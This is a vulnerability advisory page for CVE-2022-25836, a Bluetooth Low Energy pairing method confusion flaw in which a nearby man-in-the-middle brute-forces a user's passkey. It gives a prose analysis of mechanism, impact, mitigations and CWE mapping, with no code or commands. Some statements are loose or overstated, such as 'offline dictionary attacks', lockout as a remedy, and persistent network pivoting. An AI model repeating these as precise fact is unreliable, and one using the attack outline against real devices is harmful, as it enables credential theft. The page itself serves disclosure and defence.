CVE-2022-25836 in Code Specification
Summary
by MITRE • 12/12/2022
Bluetooth® Low Energy Pairing in Bluetooth Core Specification v4.0 through v5.3 may permit an unauthenticated MITM to acquire credentials with two pairing devices via adjacent access when the MITM negotiates Legacy Passkey Pairing with the pairing Initiator and Secure Connections Passkey Pairing with the pairing Responder and brute forces the Passkey entered by the user into the Initiator. The MITM attacker can use the identified Passkey value to complete authentication with the Responder via Bluetooth pairing method confusion.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 06/18/2026
This vulnerability resides within the Bluetooth Low Energy pairing mechanisms defined in the Bluetooth Core Specification versions 4.0 through 5.3, representing a significant security flaw that exploits the trust relationship between paired devices. The issue manifests when an attacker positioned in close proximity can manipulate the pairing process between two legitimate devices, creating a scenario where the attacker can intercept and exploit authentication credentials through a sophisticated man-in-the-middle attack vector. The vulnerability specifically targets the Legacy Passkey Pairing method used by the initiating device and Secure Connections Passkey Pairing employed by the responding device, creating an asymmetric authentication landscape that the attacker can leverage.
The technical exploitation occurs through a carefully orchestrated sequence where the attacker establishes separate pairing sessions with each device, using different pairing methods to create confusion in the authentication process. When the user enters a passkey into the initiating device, the attacker can brute force this value through computational means, exploiting weaknesses in the legacy pairing protocol's cryptographic implementation. This brute force attack becomes possible because the legacy passkey entry mechanism lacks sufficient entropy and proper cryptographic protection, making it vulnerable to offline dictionary attacks. The vulnerability is particularly dangerous because it requires no specialized equipment beyond standard Bluetooth capabilities and operates within the physical proximity required for normal Bluetooth communication, making it accessible to attackers in typical environments.
The operational impact of this vulnerability extends beyond simple credential theft, as it allows attackers to establish persistent unauthorized access to Bluetooth devices and their associated networks. Once the attacker successfully brute forces the passkey and completes the authentication process with the responder device, they can maintain access to the device and potentially use it as a pivot point for further attacks within the network. This vulnerability affects a broad range of devices including smartphones, tablets, laptops, and IoT devices that rely on Bluetooth Low Energy for connectivity and pairing. The attack vector is particularly concerning in environments where Bluetooth devices are frequently paired with other devices, such as in corporate offices, public spaces, or homes where users may not be aware of the ongoing pairing process.
Mitigation strategies must address both the immediate pairing vulnerability and the underlying protocol weaknesses that enable the attack. Device manufacturers should implement enhanced passkey validation mechanisms that prevent brute force attacks by introducing rate limiting and account lockout features. Additionally, the Bluetooth implementations should be updated to enforce secure pairing methods and reject legacy pairing protocols where possible. The attack pattern aligns with tactics described in the ATT&CK framework under credential access and defense evasion categories, specifically targeting the use of legitimate credentials for unauthorized access. Organizations should also implement network monitoring to detect anomalous pairing behavior and establish security policies that require users to verify pairing requests before accepting them. The vulnerability relates to CWE-310 which addresses cryptographic weaknesses and CWE-287 which covers improper authentication, making it a critical issue requiring immediate attention from both device manufacturers and end users who must update their systems to prevent exploitation.
The fundamental weakness in this vulnerability stems from the backward compatibility requirements of the Bluetooth specification, which maintains support for older, less secure pairing methods while newer, more secure alternatives exist. This creates a situation where security improvements cannot be fully implemented without breaking existing device compatibility, leaving users vulnerable to attacks that exploit these legacy protocols. The vulnerability demonstrates the challenges in maintaining security in widely deployed communication protocols where the need for backward compatibility conflicts with modern security requirements. Organizations should prioritize updating their Bluetooth implementations and educate users about the risks of accepting pairing requests from unknown devices, while also implementing network segmentation to limit the potential impact of successful attacks. The attack methodology represents a sophisticated form of protocol confusion that requires careful analysis of the pairing state machine and the timing relationships between authentication events to properly understand and defend against.